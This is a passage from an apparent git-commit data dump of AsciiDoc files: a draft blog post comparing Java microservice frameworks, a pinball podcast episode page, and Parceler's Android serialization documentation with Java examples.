OAuthFactory<>(guiceBundle.getInjector().getInstance(FacebookTokenAuthenticator.class),\n getName() + \"-Realm\",\n User.class)));\n----\n\nSo far so good, it works as expected.\n\n=== Monitoring\n\nDropwizard has a built-in monitoring system. You can register healthchecks to ensure that the app is up, and each resource can be metered simply using annotations. You can also add custom metrics, using the metrics registry obtained from the `Environment`.\n\n=== Conclusion\n\nWhile a bit verbose due to all the plumbing involved in the setup, Dropwizard is a nice framework. It provides all the functions needed to build a MicroServices-based application. However, to build tiny services, the amount of plumbing required can be too high compared to the business code; I would not recommend using it in that case. Otherwise, you cannot go wrong!\n\n\n== Vertx\n\n\"`Vertx is a tool-kit for building reactive applications on the JVM.`\". You can develop with it in Java of course, but also in many languages running on the JVM (Javascript, Scala, Ruby, Python, Clojure).\n\nIt also provides an actors-like system, the \"verticles\", which allows the deployment of independent, concurrent services, potentially written in different languages, communicating over an event bus. As stated by the documentation, you are not forced to use this model (I didn't in this case, however I will give it a try!).\n\n=== Main\n\nThe framework abstracts the low level handling of HTTP, but you need to create the server by hand:\n\n[source,java]\n----\nVertx vertx = Vertx.create();\nHttpServer server = vertx.createHttpServer(serverOptions);\n----\n\nMaybe you noticed the serverOptions parameter (sure you did!). This is the definition:\n\n[source, java]\n----\nHttpServerOptions serverOptions = new HttpServerOptions()\n .setSsl(true)\n .setKeyStoreOptions(new JksOptions()\n .setPath(System.getProperty(\"javax.net.ssl.keyStorePath\"))\n .setPassword(System.getProperty(\"javax.net.ssl.keyStorePassword\")))\n .setPort(8090);\n----\n\nThis object allows you to set the port and SSL properties. It doesn't automatically pick up the standard properties, so you have to do it yourself. Not really a problem.\n\nThe main method creates the HTTP client, sets up the authentication system and binds \"resources\" to routes.\n\n=== Resources\n\nThere is no resource class in Vertx.
You just give handlers to routes:\n\n[source, java]\n----\nCarResource carResource = new CarResource(carRepository);\nrouter.get(\"\/cars\/:id\").produces(\"application\/json\").handler(carResource::byId);\n----\n\n`CarResource` is simply a POJO having a method named `byId` with a `RoutingContext` as parameter:\n\n[source, java]\n----\npublic void byId(RoutingContext routingContext) {\n HttpServerResponse response = routingContext.response();\n String idParam = routingContext.request().getParam(\"id\");\n if (idParam == null) {\n response.setStatusCode(400).end();\n } else {\n Optional<Car> car = carRepository.byId(Integer.parseInt(idParam));\n if (car.isPresent()) {\n CarRepresentation carRepresentation = new CarRepresentation(car.get());\n carRepresentation.addLink(self(routingContext.request().absoluteURI()));\n response.putHeader(\"content-type\", \"application\/json\")\n .end(Json.encode(carRepresentation));\n } else {\n response.setStatusCode(404).end();\n }\n }\n}\n----\n\nAs you can see, you have a total control on the response, and no choice about that. No problem, you know what you do, exactly. The JSON encoding is done by Jackson again, and you still have to disable the \"fail on unknown property\" feature.\n\nOh, by the way, this will not work without a subtle configuration on the route:\n\n[source,java]\n----\nrouter.route(\"\/cars*\").handler(BodyHandler.create());\n----\n\nBy default, Vertx ignores the body, so you have to explicitly say \"I want to read it\". Otherwise, you don't get the body content.\n\nNote that this time, there is no dependency injection, all is done manually. Not a big deal.\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\nTODO...\nIts style is really puzzling at first sight for people like me that are not used to asynchronous programming. But once you get the thing, it's probably one of the best tools I ever used.\n\n== Spring Boot\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n== Restlet\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n== SparkJava\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n\n...\n\n\/\/\/\/\nToute remarque et aide \u00e0 l'am\u00e9lioration est bienvenue :)\n\/\/\/\/\n\n== A conclusion\nIt's been a long journey. The study is not as complete as I first wanted, but I guess it's a good start.\n\n\nNOTE: TODO blah blah...\n\nAll the code is available on github (give link). You are free and encouraged to fork, play with the code and give feedback.","old_contents":"= A comparison of Microservices Frameworks\n:hp-tags: Tech, Microservices, REST\n\nMicroservice is probably one of the most used term nowadays when speaking about software architecture. Although the underlying concepts aren't new, it is one of the biggest buzzword of the two last years.\n\nTo summarize, big monolithic architectures tend to become not very maintainable and extendable when they grow over a certain size. Moreover, they don't scale well (you scale by multiplying big applications), and you can't replace old parts easily.\n\nOne of the biggest advantages of microservices is to address these concerns: instead of building an entire application as one block, one can build it as a set of services which will communicate over some kind of messaging system (most of the time, REST over HTTP). 
Given that, you will be able to replace one piece if you need to, you can scale only one piece because you need to, and so on.\n\nBut there is a counterpart: as you're building a distributed system, you will have the disadvantages of a distributed system. Building a distributed system as microservices architecture is not that easy, but fortunately there are many frameworks to help you. This article will present some of them.\n\n\n== Requirements\n\nI don't want to make another comparison based on some \"Hello World\" application. Most of the frameworks provide a simple way to start a server and respond to a simple request with only one line.\n\nBut this is not the real life. In the real life, you should not use plain HTTP. You would use REST \/ HTTPS and have an HTTPS client. You would add a Location header after a successful creation, and add links to your JSON or XML representations. You should have metrics included, to monitor your application. You have some kind of security to protect the access to your API.\n\nHere is a list of what I am going to evaluate.\n\n* I'm about to build a tiny RESTful API. UI is not considered in this article (note that every candidate framework has a mean to serve static resources easily)\n* Only use HTTPS to access the API\n* The API will have two sets of resources (aka two microservices). For simplicity's sake, they will be deployed in the same server, but will communicate over HTTPS.\n* The resource will have a JSON representation\n* Each representation will have at least a self link to the resource\n* After a resource creation, client receive a Location header (the resource's link)\n* The API will be accessible only by people providing a Facebook OAuth token\n* Each API must have a monitoring \/ metrics facility\n* Each service may be packaged as a standalone jar, to be run using `java -jar`.\n* On the performance side, I will measure:\n** request time of POST and GET\n** the startup time of each server (not that important, but interesting)\n** the memory footprint of the application\n* Finally, I will give the final size of the package.\n\n== The candidates\n\nHere is the list of candidates:\n\n* http:\/\/www.dropwizard.io\/[Dropwizard]\n* http:\/\/vertx.io\/[Vertx]\n* http:\/\/projects.spring.io\/spring-boot\/[Spring Boot]\n* http:\/\/restlet.com\/projects\/restlet-framework\/[Restlet]\n* http:\/\/sparkjava.com\/[Spark] + http:\/\/unirest.io\/java.html[Unirest] (REST client, Spark doesn't provide a REST client itself)\n\nNote that Restlet and Spark doesn't claim to be MicroServices frameworks, but Restlet is known to be a very good REST framework, and Spark is so lightweight that I couldn't resist to try it against bigger frameworks like Spring Boot.\n\n== Prerequisites\n\nEach sample run with a simple `java -jar` command. You will need to set some properties to enable ssl: `-Djavax.net.ssl.trustStore=... -Djavax.net.ssl.trustStorePassword=... -Djavax.net.ssl.keyStorePassword=... -Djavax.net.ssl.keyStorePath=...`.\n\nIn order to be able to run the samples, you need to create a keystore (see http:\/\/www.javacodegeeks.com\/2014\/07\/java-keystore-tutorial.html[this tutorial] for example), and install a self-signed certificate. You will need the Facebook certificate too (see http:\/\/serverfault.com\/questions\/139728\/how-to-download-the-ssl-certificate-from-a-website[here] how to get it), and a user token (see https:\/\/developers.facebook.com\/).\n\nDon't forget to modify the configuration files and system properties accordingly. 
All these steps are explained in the README file.\n\n== Dropwizard\n\nAs stated by its website, \"`Dropwizard is a Java framework for developing ops-friendly, high-performance, RESTful web services.`\". It is a bundle of some successful libraries such as Jetty, Jersey and Jackson. The documentation is very good, I've found everything I needed inside; a good point, as I hate being forced to search for minutes (hours?) for something said simple.\n\n=== Main\n\nThe main mehod is quite simple: you just build an `Application` instance and run it:\n[source,java]\n----\npublic static void main(String[] args) throws Exception {\n new DropwizardApplication().run(args);\n}\n----\n\nThe `DropwizardApplication` class contains all the plumbing: resource and health checks registration, Guice bootstrapping and Jackson's `ObjectMapper` configuration. It is given an instance of a configuration class (`DropwizardServerConfiguration`) which is a POJO holding the configuration properties read from the YAML file passed as parameter to our application. \n\nThe app is run with parameters: `java -jar app.jar server config.yml`. The `server` parameter is here to tell Dropwizard to start the server, but you can also manipulate the database (I didn't try this).\n\n=== Resources\n\nUnder the hood, Dropwizard uses Jersey, so the resources are just POJOs annotated with (a lot of) JAX-RS annotations:\n\n[source,java]\n----\n@Path(\"\/cars\/{id}\")\n@Produces(MediaType.APPLICATION_JSON)\npublic class CarResource {\n\n @Context\n UriInfo uriInfo;\n\n @Inject\n private CarRepository carRepository;\n\n @GET\n public Response byId(@Auth User user, @PathParam(\"id\") int carId) {\n Optional<Car> car = carRepository.byId(carId);\n return car.map(c -> {\n CarRepresentation carRepresentation = new CarRepresentation(c);\n carRepresentation.addLink(Link.self(uriInfo.getAbsolutePathBuilder().build(c.getId()).toString()));\n return Response.ok(carRepresentation).build();\n }).orElse(Response.status(Response.Status.NOT_FOUND).build());\n }\n}\n----\n\nAll the underlying HTTP handling is done by the framework, you have no mandatory access to request and response objects. In this case, the return is a `Response` but I could simply have returned the object; however, in that case the return code would not be the right one (201), so to have full control over it, I prefer that solution. Moreover, the 404 (Status.NOT_FOUND) is set on the response; I could throw an exception instead, and write a mapper to make an adequate response, but it's overkill (and I hate so-called \"Business Exceptions\").\n\nNote that injection is performed by Guice. It seems that there is a CDI container provided with Jersey (hk2), but I didn't managed to make it work. Linking is handmade, and quite easy with the `UriInfo` object. \n\nDropwizard uses Jackson to serialize \/ deserialize the object returned to JSON, so you have nothing special to do... but you have to configure the `ObjectMapper` to disable errors on unknown properties (see http:\/\/martinfowler.com\/bliki\/TolerantReader.html[Tolerant Reader]).\n\n=== HTTPS\n\nHTTPS is configured in the YAML configuration file; the framework ignores the standard Java properties. The documentation explains exactly how to set it up, and there is no surprise here.\n\n=== REST client\n\nThe REST client is built by Guice, as a singleton; it is not managed as documented, I didn't managed to make it work this way. 
Otherwise, nothing special about the client, the API is fluent and simple:\n\n[source,java]\n----\n@Override\npublic List<Car> getAllCars(String auth) {\n WebTarget target = client.target(\"https:\/\/localhost:8443\/app\/cars\");\n Invocation invocation = target.request(MediaType.APPLICATION_JSON)\n .header(\"Authorization\", \"Bearer \" + auth)\n .build(HttpMethod.GET);\n Car[] cars = invocation.invoke(Car[].class);\n return asList(cars);\n}\n----\n\nThe `Client`, this time, uses the standard properties.\n\n=== Security\n\nThe authentication requires two things: first, implement the `Authenticator` interface. Note that he single method `authenticate` returns an `Optional<User>`, but not a Java 8's `Optional`, the Guava's one! What a pity... Nevermind. Second, you need to register the authenticator against Jersey:\n\n[source,java]\n----\nenvironment.jersey().register(AuthFactory.binder(\n new OAuthFactory<>(guiceBundle.getInjector().getInstance(FacebookTokenAuthenticator.class),\n getName() + \"-Realm\",\n User.class)));\n----\n\nSo far so good, it works as expected.\n\n=== Monitoring\n\nDropwizard has a built-in monitoring system. You can register healthchecks to ensure that the app is up, and each resource can be metered simply using annotations. You can also add custom metrics, using the metrics registry obtained from the `Environment`.\n\n=== Conclusion\n\nWhile a bit verbose due to all the plumbing involved in the setup, Dropwizard is a nice framework. It provides all the functions needed to build a MicroServices-based application. However, to build tiny services, the amount of plumbing required can be too high compared to the business code; I would not recommend to use it in that case. Otherwise, you cannot go wrong!\n\n\n== Vertx\n\n\"`Vertx is a tool-kit for building reactive applications on the JVM.`\". You can develop with it in Java of course, but also many languages running on the JVM (Javascript, Scala, Ruby, Python, Clojure).\n\nIt also provides an actors-like system, the \"verticles\", which allow deployment of independent, concurrent, and potentially written in different language, services communicating over an event bus. As stated by the documentation, you are not forced to use this model (I didn't in this case, however I will give it a try!).\n\n=== Main\n\nThe framework abstracts low level handling of HTTP, but you need to create the server by hand:\n\n[source,java]\n----\nVertx vertx = Vertx.create();\nHttpServer server = vertx.createHttpServer(serverOptions);\n----\n\nMaybe you noticed the serverOptions parameter (sure you did!). This is the definition:\n\n[source, java]\n----\nHttpServerOptions serverOptions = new HttpServerOptions()\n .setSsl(true)\n .setKeyStoreOptions(new JksOptions()\n .setPath(System.getProperty(\"javax.net.ssl.keyStorePath\"))\n .setPassword(System.getProperty(\"javax.net.ssl.keyStorePassword\")))\n .setPort(8090);\n----\n\nThis object allows to set the port and SSL properties. It doesn't automatically get the standard properties, so you have to do it yourself. Not really a problem.\n\nThe main method creates the HTTP client, set the authentication system and binds \"resources\" to routes.\n\n=== Resources\n\nThere is no resource class in Vertx. 
You just give handlers to routes:\n\n[source, java]\n----\nCarResource carResource = new CarResource(carRepository);\nrouter.get(\"\/cars\/:id\").produces(\"application\/json\").handler(carResource::byId);\n----\n\n`CarResource` is simply a POJO having a method named `byId` with a `RoutingContext` as parameter:\n\n[source, java]\n----\npublic void byId(RoutingContext routingContext) {\n HttpServerResponse response = routingContext.response();\n String idParam = routingContext.request().getParam(\"id\");\n if (idParam == null) {\n response.setStatusCode(400).end();\n } else {\n Optional<Car> car = carRepository.byId(Integer.parseInt(idParam));\n if (car.isPresent()) {\n CarRepresentation carRepresentation = new CarRepresentation(car.get());\n carRepresentation.addLink(self(routingContext.request().absoluteURI()));\n response.putHeader(\"content-type\", \"application\/json\")\n .end(Json.encode(carRepresentation));\n } else {\n response.setStatusCode(404).end();\n }\n }\n}\n----\n\nNote that this time, there is no dependency injection, all is done manually. Not a big deal.\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\nTODO...\nIts style is really puzzling at first sight for people like me that are not used to asynchronous programming. But once you get the thing, it's probably one of the best tools I ever used.\n\n== Spring Boot\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n== Restlet\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n== SparkJava\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n\n...\n\n\/\/\/\/\nToute remarque et aide \u00e0 l'am\u00e9lioration est bienvenue :)\n\/\/\/\/\n\n== A conclusion\nIt's been a long journey. The study is not as complete as I first wanted, but I guess it's a good start.\n\n\nNOTE: TODO blah blah...\n\nAll the code is available on github (give link). You are free and encouraged to fork, play with the code and give feedback.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f49c5e4da1a03307aae234830e5c380ea5cf93a9","subject":"Update 2015-11-11-Episode-30-38-Weeks-Old-Next-week-Brains.adoc","message":"Update 2015-11-11-Episode-30-38-Weeks-Old-Next-week-Brains.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-11-Episode-30-38-Weeks-Old-Next-week-Brains.adoc","new_file":"_posts\/2015-11-11-Episode-30-38-Weeks-Old-Next-week-Brains.adoc","new_contents":"= Episode 30: 38 Weeks Old. 
Next week: Brains\n:hp-tags: UI, Mac, TotM, TotW, Beta, PC, Zen\n:hp-image: logo.png\n:published_at: 2015-11-11\n\nIt has been thirty-eight weeks since Chris kicked off this little thing called Table of the Month (TotM)!\n\nWe talk about some challenges with running the TotM\/TotW and the results from the last tourney.\n\nThere\u2019s new UI blah, Jared goes to the dark side and tests out TPA on Steam Mac, and we talk about Evil Week and Halloween in Aussie.\n\n== Links\n\nhttp:\/\/shoutengine.com\/BlahCadePodcast\/38-weeks-old-next-week-brains-13658[Stream\/Download\/RSS]\n\nhttps:\/\/itunes.apple.com\/us\/podcast\/blahcade-podcast\/id1039748922?mt=2[iTunes]\n\nhttps:\/\/blab.im\/BlahCade[Blab.im Live Session]\n\nhttps:\/\/represent.com\/blahcade-shirt[BlahCade T-shirts on represent.com]\n\n== Timings\n\n* Intro\n* Greetings and Salutations - 0:45\n* TotM Admin Challenges - 3:50\n* TotM Results - 8:00\n* TotW - 9:50\n* New UI PC Beta Hands-on - 14:55\n* Android User Guide 2.0? - 21:35\n* Jared Tries out TPA for Steam Mac - 23:50\n* Insurance Day On Set - 27:00\n* Evil Week - 31:35\n* Halloween in Aussie - 39:50\n* New PTX Album - 44:00\n* Interview Plans and Tshirts - 44:45\n* Penny for your Thoughts? - 46:00\n* Sponsors and Outro - 47:00\n","old_contents":"= Episode 29: 38 Weeks Old. Next week: Brains\n:hp-tags: UI, Mac, TotM, TotW, Beta, PC, Zen\n:hp-image: logo.png\n:published_at: 2015-11-11\n\nIt has been thirty-eight weeks since Chris kicked off this little thing called Table of the Month (TotM)!\n\nWe talk about some challenges with running the TotM\/TotW and the results from the last tourney.\n\nThere\u2019s new UI blah, Jared goes to the dark side and tests out TPA on Steam Mac, and we talk about Evil Week and Halloween in Aussie.\n\n== Links\n\nhttp:\/\/shoutengine.com\/BlahCadePodcast\/38-weeks-old-next-week-brains-13658[Stream\/Download\/RSS]\n\nhttps:\/\/itunes.apple.com\/us\/podcast\/blahcade-podcast\/id1039748922?mt=2[iTunes]\n\nhttps:\/\/blab.im\/BlahCade[Blab.im Live Session]\n\nhttps:\/\/represent.com\/blahcade-shirt[BlahCade T-shirts on represent.com]\n\n== Timings\n\n* Intro\n* Greetings and Salutations - 0:45\n* TotM Admin Challenges - 3:50\n* TotM Results - 8:00\n* TotW - 9:50\n* New UI PC Beta Hands-on - 14:55\n* Android User Guide 2.0? - 21:35\n* Jared Tries out TPA for Steam Mac - 23:50\n* Insurance Day On Set - 27:00\n* Evil Week - 31:35\n* Halloween in Aussie - 39:50\n* New PTX Album - 44:00\n* Interview Plans and Tshirts - 44:45\n* Penny for your Thoughts? - 46:00\n* Sponsors and Outro - 47:00\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ad2c1cada0cc5fe377f2b4180625ba6974e153f4","subject":"Touched up ActivityStarter link","message":"Touched up ActivityStarter link\n","repos":"johncarl81\/parceler-site,johncarl81\/parceler-site,johncarl81\/parceler-site","old_file":"index.adoc","new_file":"index.adoc","new_contents":"---\nlayout: default\ntitle: Parceler\ndocumentationExpanded: false\npostsExpanded: false\n---\n\nHave a question? http:\/\/stackoverflow.com\/questions\/ask?tags=parceler[Ask it on StackOverflow.]\n\nFound an issue? 
https:\/\/github.com\/johncarl81\/parceler\/issues\/new[Please report it.]\n\nimage:https:\/\/badges.gitter.im\/johncarl81\/parceler.svg[link=\"https:\/\/gitter.im\/johncarl81\/parceler?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\"]\n\n=== Introduction\n\nIn Android, http:\/\/developer.android.com\/reference\/android\/os\/Parcelable.html[Parcelables] are a great way to serialize Java Objects between Contexts.\nhttp:\/\/www.developerphil.com\/parcelable-vs-serializable\/[Compared] with traditional Serialization, Parcelables take on the order of 10x less time to both serialize and deserialize.\nThere is a major flaw with Parcelables, however.\nParcelables contain a ton of boilerplate code.\nTo implement a Parcelable, you must mirror the `writeToParcel()` and `createFromParcel()` methods such that they read and write to the Parcel in the same order.\nAlso, a Parcelable must define a `public static final Parcelable.Creator CREATOR` in order for the Android infrastructure to be able to leverage the serialization code.\n\nParceler is a code generation library that generates the Android Parcelable boilerplate source code.\nNo longer do you have to implement the Parcelable interface, the `writeToParcel()` or `createFromParcel()` methods, or the `public static final CREATOR`.\nYou simply annotate a POJO with `@Parcel` and Parceler does the rest.\nBecause Parceler uses the Java JSR-269 Annotation Processor, there is no need to run a tool manually to generate the Parcelable code.\nJust annotate your Java Bean, compile and you are finished.\nBy default, Parceler will serialize the fields of your instance directly:\n\n[source,java]\n----\n@Parcel\npublic class Example {\n String name;\n int age;\n\n public Example() {}\n\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nBe careful not to use private fields when using the default field serialization strategy as it will incur a performance penalty due to reflection.\n\nTo use the generated code, you may reference the generated class directly, or via the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrapped = Parcels.wrap(new Example(42, \"Andy\"));\n----\n\nTo dereference the `@Parcel`, just call the `Parcels.unwrap()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(wrapped);\nexample.getName(); \/\/ Andy\nexample.getAge(); \/\/ 42\n----\n\nOf course, the wrapped `Parcelable` can be added to an Android Bundle to transfer from Activity to Activity:\n\n[source,java]\n----\nBundle bundle = new Bundle();\nbundle.putParcelable(\"example\", Parcels.wrap(example));\n----\n\nAnd dereferenced in the `onCreate()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(getIntent().getParcelableExtra(\"example\"));\n----\n\nThis wrapping and unwrapping technique plays well with the Intent Factory pattern.\n
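\nA minimal sketch of that pattern (the factory and activity names here are hypothetical, not part of the library):\n\n[source,java]\n----\npublic class ExampleActivityIntentFactory {\n \/\/ Builds the Intent, hiding the extra key and the wrapping from callers\n public static Intent newIntent(Context context, Example example) {\n Intent intent = new Intent(context, ExampleActivity.class);\n intent.putExtra(\"example\", Parcels.wrap(example));\n return intent;\n }\n}\n----\n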
\nIn addition, Parceler is supported by the following libraries:\n\n * http:\/\/androidtransfuse.org\/documentation.html#parcel[Transfuse] - Allows `@Parcel` annotated beans to be used with the `@Extra` injection.\n * https:\/\/github.com\/sockeqwe\/fragmentargs#argsbundler[FragmentArgs] - Uses the `ParcelerArgsBundler` adapter to wrap and unwrap `@Parcel` annotated beans with fragment parameters.\n * https:\/\/github.com\/f2prateek\/dart[Dart] - Autodetects `@Parcel` annotated beans and automatically unwraps them when using `@InjectExtra`.\n * http:\/\/androidannotations.org\/[AndroidAnnotations] - Autodetects `@Parcel` annotated beans and https:\/\/github.com\/excilys\/androidannotations\/wiki\/ParcelerIntegration[automatically wraps\/unwraps] them when using `@Extra`, `@FragmentArg`, `@InstanceState` and other `Bundle` related annotations.\n * https:\/\/github.com\/MarcinMoskala\/ActivityStarter\/wiki\/Parceler-Arg-Converter-usage[ActivityStarter] - Uses `ParcelarArgConverter` to allow the use of Parceler objects as arguments passed to Activities, Fragments, Services, etc.\n\n=== Parcel attribute types\nOnly a select number of types may be used as attributes of a `@Parcel` class.\nThe following list includes the mapped types:\n\n * `byte`\n * `double`\n * `float`\n * `int`\n * `long`\n * `char`\n * `boolean`\n * `String`\n * `IBinder`\n * `Bundle`\n * `SparseArray` of any of the mapped types*\n * `SparseBooleanArray`\n * `ObservableField`\n * `List`, `ArrayList` and `LinkedList` of any of the mapped types*\n * `Map`, `HashMap`, `LinkedHashMap`, `SortedMap`, and `TreeMap` of any of the mapped types*\n * `Set`, `HashSet`, `SortedSet`, `TreeSet`, `LinkedHashSet` of any of the mapped types*\n * `Parcelable`\n * `Serializable`\n * Array of any of the mapped types\n * Any other class annotated with `@Parcel`\n\n*Parcel will error if the generic parameter is not mapped.\n\nParceler also supports any of the above types directly.\nThis is especially useful when dealing with collections of classes annotated with `@Parcel`:\n\n[source,java]\n----\nParcelable listParcelable = Parcels.wrap(new ArrayList<Example>());\nParcelable mapParcelable = Parcels.wrap(new HashMap<String, Example>());\n----\n
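\nUnwrapping is symmetric; a small sketch reusing the variables above:\n\n[source,java]\n----\nList<Example> examples = Parcels.unwrap(listParcelable);\nMap<String, Example> map = Parcels.unwrap(mapParcelable);\n----\n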
\n==== Polymorphism\nNote that Parceler does not unwrap inheritance hierarchies, so any polymorphic fields will be unwrapped as instances of the base class.\nThis is because Parceler opts for performance rather than checking `.getClass()` for every piece of data.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n public Parent p;\n @ParcelConstructor Example(Parent p) { this.p = p; }\n}\n\n@Parcel public class Parent {}\n@Parcel public class Child extends Parent {}\n----\n\n[source,java]\n----\nExample example = new Example(new Child());\nSystem.out.printf(\"%b%n\", example.p instanceof Child); \/\/ true\nexample = Parcels.unwrap(Parcels.wrap(example));\nSystem.out.printf(\"%b%n\", example.p instanceof Child); \/\/ false\n----\n\nRefer to the <<custom_serialization,Custom Serialization>> section for an example of working with polymorphic fields.\n\n=== Serialization techniques\n\nParceler offers several choices for how to serialize and deserialize an object in addition to the field-based serialization seen above.\n\n==== Getter\/setter serialization\nParceler may be configured to serialize using getter and setter methods and a non-empty constructor.\nIn addition, fields, methods and constructor parameters may be associated using the `@ParcelProperty` annotation.\nThis supports a number of bean strategies including immutability and traditional getter\/setter beans.\n\nTo configure default method serialization, simply configure the `@Parcel` annotation with `Serialization.BEAN`:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private String name;\n private int age;\n\n public String getName() { return name; }\n public void setName(String name) { this.name = name; }\n\n public int getAge() { return age; }\n public void setAge(int age) { this.age = age; }\n}\n----\n\nTo use a constructor with serialization, annotate the desired constructor with the `@ParcelConstructor` annotation:\n\n[source,java]\n----\n@Parcel(Serialization.BEAN)\npublic class Example {\n private final String name;\n private final int age;\n\n @ParcelConstructor\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nIf an empty constructor is present, Parceler will use that constructor unless another constructor is annotated.\n\n==== Mixing getters\/setters and fields\nYou may also mix and match serialization techniques using the `@ParcelProperty` annotation.\nIn the following example, `firstName` and `lastName` are written to the bean using the constructor while `firstName` is read from the bean using the field and `lastName` is read using the `getLastName()` method.\nThe parameters `firstName` and `lastName` are coordinated by the parameter names `\"first\"` and `\"last\"` respectively.\n\n[source,java]\n----\n@Parcel\npublic class Example {\n @ParcelProperty(\"first\")\n String firstName;\n String lastName;\n\n @ParcelConstructor\n public Example(@ParcelProperty(\"first\") String firstName, @ParcelProperty(\"last\") String lastName){\n this.firstName = firstName;\n this.lastName = lastName;\n }\n\n public String getFirstName() { return firstName; }\n\n @ParcelProperty(\"last\")\n public String getLastName() { return lastName; }\n}\n----\n\nFor attributes that should not be serialized with Parceler, the attribute field, getter or setter may be annotated by `@Transient`.\n
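\nFor instance, a minimal sketch of my own (not taken from the project docs):\n\n[source,java]\n----\n@Parcel\npublic class Example {\n String name;\n @Transient String displayNameCache; \/\/ skipped during parcelling, null after unwrap\n}\n----\n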
\nParceler supports many different styles centering around the POJO.\nThis allows `@Parcel` annotated classes to be used with other POJO based libraries, including the following:\n\n * https:\/\/code.google.com\/p\/google-gson\/[GSON]\n * https:\/\/realm.io\/docs\/java\/latest\/#parceler[Realm]\n * https:\/\/bitbucket.org\/littlerobots\/cupboard[Cupboard]\n * http:\/\/simple.sourceforge.net\/[Simple XML]\n * https:\/\/github.com\/Raizlabs\/DBFlow[DBFlow]\n\n==== Static Factory support\nAs an alternative to using a constructor directly, Parceler supports using an annotated Static Factory to build an instance of the given class.\nThis style supports Google's https:\/\/github.com\/google\/auto\/tree\/master\/value[AutoValue] annotation processor \/ code generation library for generating immutable beans.\nParceler interfaces with AutoValue via the `@ParcelFactory` annotation, which maps a static factory method into the annotated `@Parcel` serialization:\n\n[source,java]\n----\n@AutoValue\n@Parcel\npublic abstract class AutoValueParcel {\n\n @ParcelProperty(\"value\") public abstract String value();\n\n @ParcelFactory\n public static AutoValueParcel create(String value) {\n return new AutoValue_AutoValueParcel(value);\n }\n}\n----\n\nAutoValue generates a different class than the annotated `@Parcel`, therefore you need to specify which class Parceler should build in the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrappedAutoValue = Parcels.wrap(AutoValueParcel.class, AutoValueParcel.create(\"example\"));\n----\nAnd to deserialize:\n[source,java]\n----\nAutoValueParcel autoValueParcel = Parcels.unwrap(wrappedAutoValue);\n----\n\n==== Custom serialization\n`@Parcel` includes an optional parameter to include a manual serializer `ParcelConverter` for the case where special serialization is necessary.\nThis provides a still cleaner option for using Parcelable classes than implementing them by hand.\n\nThe following code demonstrates using a `ParcelConverter` to unwrap the inheritance hierarchy during deserialization.\n\n[source,java]\n----\n@Parcel\npublic class Item {\n @ParcelPropertyConverter(ItemListParcelConverter.class)\n public List<Item> itemList;\n}\n@Parcel public class SubItem1 extends Item {}\n@Parcel public class SubItem2 extends Item {}\n\npublic class ItemListParcelConverter implements ParcelConverter<List<Item>> {\n @Override\n public void toParcel(List<Item> input, Parcel parcel) {\n if (input == null) {\n parcel.writeInt(-1);\n }\n else {\n parcel.writeInt(input.size());\n for (Item item : input) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n }\n }\n\n @Override\n public List<Item> fromParcel(Parcel parcel) {\n int size = parcel.readInt();\n if (size < 0) return null;\n List<Item> items = new ArrayList<Item>();\n for (int i = 0; i < size; ++i) {\n items.add((Item) Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader())));\n }\n return items;\n }\n}\n----\n\nParceler is also packaged with a series of base classes to make Collection conversion easier, located under the `org.parceler.converter` package of the API.\nThese base classes take care of a variety of difficult or verbose jobs dealing with Collections, including null checks and collection iteration.\nFor instance, the above `ParcelConverter` could be written using the `ArrayListParcelConverter`:\n\n[source,java]\n----\npublic class ItemListParcelConverter extends ArrayListParcelConverter<Item> {\n @Override\n public void itemToParcel(Item item, Parcel parcel) {\n parcel.writeParcelable(Parcels.wrap(item), 0);\n }\n\n @Override\n public Item itemFromParcel(Parcel parcel) {\n return Parcels.unwrap(parcel.readParcelable(Item.class.getClassLoader()));\n }\n}\n----\n\n=== Classes without Java source\nFor classes whose corresponding Java source is not available, one may include the class as a Parcel by using the `@ParcelClass` annotation.\nThis annotation may be declared anywhere in the compiled source that is convenient.\nFor instance, one could include the `@ParcelClass` along with the Android Application:\n\n[source,java]\n----\n@ParcelClass(LibraryParcel.class)\npublic class AndroidApplication extends Application {\n \/\/...\n}\n----\n\nMultiple `@ParcelClass` annotations may be declared using the `@ParcelClasses` annotation.\n\nIn addition, classes referenced by `@ParcelClass` may be configured using the `@Parcel` annotation.\nThis allows the serialization configuration through any parameter available on the `@Parcel` annotation, including the serialization technique or classes to analyze.\n\nOne useful technique is the ability to define global custom converters for a type:\n[source,java]\n----\n@ParcelClass(\n value = LibraryParcel.class,\n annotation = @Parcel(converter = 